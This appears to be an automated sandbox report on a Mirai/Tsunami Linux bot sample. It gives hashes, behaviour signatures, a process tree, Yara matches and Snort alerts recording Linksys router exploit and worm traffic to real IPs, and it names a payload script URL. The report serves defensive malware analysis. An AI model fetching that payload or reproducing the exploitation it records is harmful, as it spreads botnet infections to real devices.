Linux Analysis Report Tsunami.x86

Overview

General Information

Sample Name: Tsunami.x86
Analysis ID: 512552
MD5: eeff9245e700bd5a5ad66e2b7da182e0
SHA1: 4fc227c03eadaabb350fa2fffdf84ec47d707fb9
SHA256: 35c466355eb2680e17f3727da23d045ae0a6a1abca1032a33138cdeea20478bf

Detection

Mirai
Score: 88
Range: 0 - 100
Whitelisted: false

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Multi AV Scanner detection for submitted file
Sample tries to kill many processes (SIGKILL)
Connects to many ports of the same IP (likely port scanning)
Reads system files that contain records of logged in users
Sample is packed with UPX
Uses known network protocols on non-standard ports
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample contains only a LOAD segment without any section mappings
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Executes the "grep" command used to find patterns in files or piped streams
Uses the "uname" system call to query kernel version information (possible evasion)
Enumerates processes within the "proc" file system
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected TCP or UDP traffic on non-standard ports
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Deletes log files
Creates hidden files and/or directories
Sample tries to set the executable flag
HTTP GET or POST without a user agent
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 512552
Start date: 01.11.2021
Start time: 04:15:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 48s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Tsunami.x86
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode: default
Detection: MAL
Classification: mal88.spre.troj.evad.linX86@0/106@0/0
Warnings:
  • Connection to analysis system has been lost, crash info: Unknown
  • TCP Packets have been reduced to 100
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: http://23.94.37.59/zyxel.sh;

Process Tree

  • system is lnxubuntu20
  • systemd New Fork (PID: 5269, Parent: 1)
  • sshd (PID: 5269, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 5272, Parent: 1)
  • sshd (PID: 5272, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • systemd New Fork (PID: 5285, Parent: 1)
  • systemd-resolved (PID: 5285, Parent: 1, MD5: c93bbc5e20248114c56896451eab7a8b) Arguments: /lib/systemd/systemd-resolved
  • systemd New Fork (PID: 5572, Parent: 1)
  • systemd-logind (PID: 5572, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 5709, Parent: 1)
  • accounts-daemon (PID: 5709, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 5724, Parent: 5709, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 5725, Parent: 5724, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 5726, Parent: 5725, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 5727, Parent: 5726)
          • locale (PID: 5727, Parent: 5726, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 5728, Parent: 5726)
          • grep (PID: 5728, Parent: 5726, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • rm (PID: 5712, Parent: 1900, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
  • systemd New Fork (PID: 5713, Parent: 1860)
  • pulseaudio (PID: 5713, Parent: 1860, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • Default (PID: 5719, Parent: 1809, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PostSession/Default
  • gdm3 New Fork (PID: 5731, Parent: 1320)
  • gdm-session-worker (PID: 5731, Parent: 1320, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm-x-session (PID: 5738, Parent: 5731, MD5: 498a824333f1c1ec7767f4612d1887cc) Arguments: /usr/lib/gdm3/gdm-x-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
      • Xorg (PID: 5742, Parent: 5738, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg.wrap (PID: 5742, Parent: 5738, MD5: 48993830888200ecf19dd7def0884dfd) Arguments: /usr/lib/xorg/Xorg.wrap vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg (PID: 5742, Parent: 5738, MD5: 730cf4c45a7ee8bea88abf165463b7f8) Arguments: /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
        • Xorg New Fork (PID: 5773, Parent: 5742)
        • sh (PID: 5773, Parent: 5742, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
          • sh New Fork (PID: 5774, Parent: 5773)
          • xkbcomp (PID: 5774, Parent: 5773, MD5: c5f953aec4c00d2a1cc27acb75d62c9b) Arguments: /usr/bin/xkbcomp -w 1 -R/usr/share/X11/xkb -xkm - -em1 "The XKEYBOARD keymap compiler (xkbcomp) reports:" -emp "> " -eml "Errors from xkbcomp are not fatal to the X server" /tmp/server-0.xkm
      • dbus-daemon (PID: 5795, Parent: 5738, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 4 --session
        • dbus-daemon New Fork (PID: 5797, Parent: 5795)
          • false (PID: 5798, Parent: 5797, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
  • gdm3 New Fork (PID: 5732, Parent: 1320)
  • Default (PID: 5732, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5733, Parent: 1320)
  • Default (PID: 5733, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5736, Parent: 1320)
  • Default (PID: 5736, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5801, Parent: 1320)
  • Default (PID: 5801, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 5802, Parent: 1320)
  • Default (PID: 5802, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 5854, Parent: 1)
  • sshd (PID: 5854, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 5855, Parent: 1)
  • sshd (PID: 5855, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • systemd New Fork (PID: 5858, Parent: 1)
  • systemd-resolved (PID: 5858, Parent: 1, MD5: c93bbc5e20248114c56896451eab7a8b) Arguments: /lib/systemd/systemd-resolved
  • systemd New Fork (PID: 6122, Parent: 1)
  • systemd-logind (PID: 6122, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 6239, Parent: 1320)
  • gdm-session-worker (PID: 6239, Parent: 1320, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm-x-session (PID: 6256, Parent: 6239, MD5: 498a824333f1c1ec7767f4612d1887cc) Arguments: /usr/lib/gdm3/gdm-x-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
      • Xorg (PID: 6258, Parent: 6256, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg.wrap (PID: 6258, Parent: 6256, MD5: 48993830888200ecf19dd7def0884dfd) Arguments: /usr/lib/xorg/Xorg.wrap vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg (PID: 6258, Parent: 6256, MD5: 730cf4c45a7ee8bea88abf165463b7f8) Arguments: /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
        • Xorg New Fork (PID: 6278, Parent: 6258)
        • sh (PID: 6278, Parent: 6258, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
          • sh New Fork (PID: 6279, Parent: 6278)
          • xkbcomp (PID: 6279, Parent: 6278, MD5: c5f953aec4c00d2a1cc27acb75d62c9b) Arguments: /usr/bin/xkbcomp -w 1 -R/usr/share/X11/xkb -xkm - -em1 "The XKEYBOARD keymap compiler (xkbcomp) reports:" -emp "> " -eml "Errors from xkbcomp are not fatal to the X server" /tmp/server-0.xkm
      • dbus-daemon (PID: 6283, Parent: 6256, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 4 --session
        • dbus-daemon New Fork (PID: 6285, Parent: 6283)
          • false (PID: 6286, Parent: 6285, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
  • systemd New Fork (PID: 6242, Parent: 1)
  • accounts-daemon (PID: 6242, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6246, Parent: 6242, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6247, Parent: 6246, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6248, Parent: 6247, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6251, Parent: 6248)
          • locale (PID: 6251, Parent: 6248, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6252, Parent: 6248)
          • grep (PID: 6252, Parent: 6248, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • systemd New Fork (PID: 6254, Parent: 1)
  • systemd (PID: 6254, Parent: 1, MD5: 9b2bec7092a40488108543f9334aab75) Arguments: /lib/systemd/systemd --user
    • systemd New Fork (PID: 6259, Parent: 6254)
      • systemd New Fork (PID: 6260, Parent: 6259)
      • 30-systemd-environment-d-generator (PID: 6260, Parent: 6259, MD5: 42417da8051ba8ee0eea7854c62d99ca) Arguments: /usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
    • systemd New Fork (PID: 6265, Parent: 6254)
    • systemctl (PID: 6265, Parent: 6254, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: /bin/systemctl --user set-environment DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/127/bus
    • systemd New Fork (PID: 6268, Parent: 6254)
    • pulseaudio (PID: 6268, Parent: 6254, MD5: 0c3b4c789d8ffb12b25507f27e14c186) Arguments: /usr/bin/pulseaudio --daemonize=no --log-target=journal
  • gdm3 New Fork (PID: 6290, Parent: 1320)
  • Default (PID: 6290, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 6291, Parent: 1320)
  • Default (PID: 6291, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 6311, Parent: 1)
  • sshd (PID: 6311, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 6312, Parent: 1)
  • sshd (PID: 6312, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • systemd New Fork (PID: 6315, Parent: 1)
  • systemd-resolved (PID: 6315, Parent: 1, MD5: c93bbc5e20248114c56896451eab7a8b) Arguments: /lib/systemd/systemd-resolved
  • systemd New Fork (PID: 6583, Parent: 1)
  • systemd-logind (PID: 6583, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • systemd New Fork (PID: 6700, Parent: 1)
  • accounts-daemon (PID: 6700, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 6704, Parent: 6700, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 6705, Parent: 6704, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 6706, Parent: 6705, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 6707, Parent: 6706)
          • locale (PID: 6707, Parent: 6706, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 6708, Parent: 6706)
          • grep (PID: 6708, Parent: 6706, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • gdm3 New Fork (PID: 6709, Parent: 1320)
  • gdm-session-worker (PID: 6709, Parent: 1320, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
    • gdm-x-session (PID: 6717, Parent: 6709, MD5: 498a824333f1c1ec7767f4612d1887cc) Arguments: /usr/lib/gdm3/gdm-x-session "dbus-run-session -- gnome-session --autostart /usr/share/gdm/greeter/autostart"
      • Xorg (PID: 6719, Parent: 6717, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/bin/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg.wrap (PID: 6719, Parent: 6717, MD5: 48993830888200ecf19dd7def0884dfd) Arguments: /usr/lib/xorg/Xorg.wrap vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
      • Xorg (PID: 6719, Parent: 6717, MD5: 730cf4c45a7ee8bea88abf165463b7f8) Arguments: /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /var/lib/gdm3/.cache/gdm/Xauthority -background none -noreset -keeptty -verbose 3
        • Xorg New Fork (PID: 7533, Parent: 6719)
        • sh (PID: 7533, Parent: 6719, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "\"/usr/bin/xkbcomp\" -w 1 \"-R/usr/share/X11/xkb\" -xkm \"-\" -em1 \"The XKEYBOARD keymap compiler (xkbcomp) reports:\" -emp \"> \" -eml \"Errors from xkbcomp are not fatal to the X server\" \"/tmp/server-0.xkm\""
          • sh New Fork (PID: 7534, Parent: 7533)
          • xkbcomp (PID: 7534, Parent: 7533, MD5: c5f953aec4c00d2a1cc27acb75d62c9b) Arguments: /usr/bin/xkbcomp -w 1 -R/usr/share/X11/xkb -xkm - -em1 "The XKEYBOARD keymap compiler (xkbcomp) reports:" -emp "> " -eml "Errors from xkbcomp are not fatal to the X server" /tmp/server-0.xkm
      • dbus-daemon (PID: 7540, Parent: 6717, MD5: 3089d47e3f3ab84cd81c48fd406d7a8c) Arguments: dbus-daemon --print-address 4 --session
        • dbus-daemon New Fork (PID: 7542, Parent: 7540)
          • false (PID: 7543, Parent: 7542, MD5: 3177546c74e4f0062909eae43d948bfc) Arguments: /bin/false
  • systemd New Fork (PID: 6715, Parent: 1)
  • systemd (PID: 6715, Parent: 1, MD5: 9b2bec7092a40488108543f9334aab75) Arguments: /lib/systemd/systemd --user
    • systemd New Fork (PID: 6720, Parent: 6715)
      • systemd New Fork (PID: 6721, Parent: 6720)
      • 30-systemd-environment-d-generator (PID: 6721, Parent: 6720, MD5: 42417da8051ba8ee0eea7854c62d99ca) Arguments: /usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
  • systemd New Fork (PID: 6728, Parent: 1)
  • sshd (PID: 6728, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 6731, Parent: 1)
  • systemd-resolved (PID: 6731, Parent: 1, MD5: c93bbc5e20248114c56896451eab7a8b) Arguments: /lib/systemd/systemd-resolved
  • systemd New Fork (PID: 6992, Parent: 1)
  • sshd (PID: 6992, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • systemd New Fork (PID: 6997, Parent: 1)
  • systemd-logind (PID: 6997, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 7116, Parent: 1320)
  • Default (PID: 7116, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 7117, Parent: 1320)
  • Default (PID: 7117, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • systemd New Fork (PID: 7118, Parent: 1)
  • accounts-daemon (PID: 7118, Parent: 1, MD5: 01a899e3fb5e7e434bea1290255a1f30) Arguments: /usr/lib/accountsservice/accounts-daemon
    • language-validate (PID: 7122, Parent: 7118, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /usr/share/language-tools/language-validate en_US.UTF-8
      • language-options (PID: 7123, Parent: 7122, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/share/language-tools/language-options
        • sh (PID: 7124, Parent: 7123, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "locale -a | grep -F .utf8 "
          • sh New Fork (PID: 7125, Parent: 7124)
          • locale (PID: 7125, Parent: 7124, MD5: c72a78792469db86d91369c9057f20d2) Arguments: locale -a
          • sh New Fork (PID: 7126, Parent: 7124)
          • grep (PID: 7126, Parent: 7124, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -F .utf8
  • gdm3 New Fork (PID: 7129, Parent: 1320)
  • gdm-session-worker (PID: 7129, Parent: 1320, MD5: 692243754bd9f38fe9bd7e230b5c060a) Arguments: "gdm-session-worker [pam/gdm-launch-environment]"
  • systemd New Fork (PID: 7135, Parent: 1)
  • systemd (PID: 7135, Parent: 1, MD5: 9b2bec7092a40488108543f9334aab75) Arguments: /lib/systemd/systemd --user
    • systemd New Fork (PID: 7137, Parent: 7135)
      • systemd New Fork (PID: 7138, Parent: 7137)
      • 30-systemd-environment-d-generator (PID: 7138, Parent: 7137, MD5: 42417da8051ba8ee0eea7854c62d99ca) Arguments: /usr/lib/systemd/user-environment-generators/30-systemd-environment-d-generator
  • systemd New Fork (PID: 7143, Parent: 1)
  • systemd-resolved (PID: 7143, Parent: 1, MD5: c93bbc5e20248114c56896451eab7a8b) Arguments: /lib/systemd/systemd-resolved
  • systemd New Fork (PID: 7404, Parent: 1)
  • sshd (PID: 7404, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -t
  • systemd New Fork (PID: 7407, Parent: 1)
  • sshd (PID: 7407, Parent: 1, MD5: dbca7a6bbf7bf57fedac243d4b2cb340) Arguments: /usr/sbin/sshd -D
  • systemd New Fork (PID: 7410, Parent: 1)
  • systemd-logind (PID: 7410, Parent: 1, MD5: 8dd58a1b4c12f7a1d5fe3ce18b2aaeef) Arguments: /lib/systemd/systemd-logind
  • gdm3 New Fork (PID: 7527, Parent: 1320)
  • Default (PID: 7527, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • gdm3 New Fork (PID: 7528, Parent: 1320)
  • Default (PID: 7528, Parent: 1320, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default
  • cleanup

Yara Overview

Memory Dumps

Source: 5246.1.0000000081fd3d8d.00000000664d72ba.rw-.sdmp
Rule: SUSP_XORed_Mozilla
Description: Detects suspicious XORed keyword - Mozilla/5.0
Author: Florian Roth
Strings:
  • 0x3e0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x440:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x4e8:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3

Source: 5244.1.0000000081fd3d8d.00000000664d72ba.rw-.sdmp
Rule: SUSP_XORed_Mozilla
Description: Detects suspicious XORed keyword - Mozilla/5.0
Author: Florian Roth
Strings:
  • 0x3e0:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x440:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0x4e8:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3

Source: 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp
Rule: SUSP_XORed_Mozilla
Description: Detects suspicious XORed keyword - Mozilla/5.0
Author: Florian Roth
Strings:
  • 0xf6ec:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0xf748:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0xf7e4:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3

Source: 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp
Rule: JoeSecurity_Mirai_8
Description: Yara detected Mirai
Author: Joe Security

Source: 5246.1.000000001a887bdc.00000000934a2024.r-x.sdmp
Rule: SUSP_XORed_Mozilla
Description: Detects suspicious XORed keyword - Mozilla/5.0
Author: Florian Roth
Strings:
  • 0xf6ec:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0xf748:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3
  • 0xf7e4:$xo1: \xCE\xEC\xF9\xEA\xEF\xEF\xE2\xAC\xB6\xAD\xB3

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Tsunami.x86, Virustotal: Detection: 32%
Source: Tsunami.x86, ReversingLabs: Detection: 33%
Source: /usr/bin/pulseaudio (PID: 5713), Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/lib/xorg/Xorg (PID: 5742), Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/lib/xorg/Xorg (PID: 6258), Reads CPU info from /sys: /sys/devices/system/cpu/online
Source: /usr/lib/xorg/Xorg (PID: 6719), Reads CPU info from /sys: /sys/devices/system/cpu/online

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33478 -> 172.65.89.25:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:33478 -> 172.65.89.25:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:49172 -> 172.65.101.0:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49172 -> 172.65.101.0:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:49172 -> 172.65.101.0:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:41000 -> 172.247.3.158:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41000 -> 172.247.3.158:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:41000 -> 172.247.3.158:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59980 -> 112.135.204.131:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42004 -> 88.28.223.229:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.106.56:8080 -> 192.168.2.23:41466
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.223.229:8080 -> 192.168.2.23:55832
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.186.179:80 -> 192.168.2.23:50108
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51192 -> 88.139.225.30:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54748 -> 172.65.55.181:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54748 -> 172.65.55.181:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:54748 -> 172.65.55.181:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56830 -> 172.65.168.229:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56830 -> 172.65.168.229:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:56830 -> 172.65.168.229:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50816 -> 172.65.202.205:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50816 -> 172.65.202.205:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:50816 -> 172.65.202.205:55555
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 31.208.247.168: -> 192.168.2.23:
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.36.131:80 -> 192.168.2.23:42076
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.222.173:80 -> 192.168.2.23:41282
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.91.84:8080 -> 192.168.2.23:52680
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:37706 -> 172.245.222.125:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37706 -> 172.245.222.125:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:37706 -> 172.245.222.125:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34292 -> 95.69.43.170:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57342 -> 88.147.250.8:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36794 -> 88.198.99.42:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.242.136:80 -> 192.168.2.23:58356
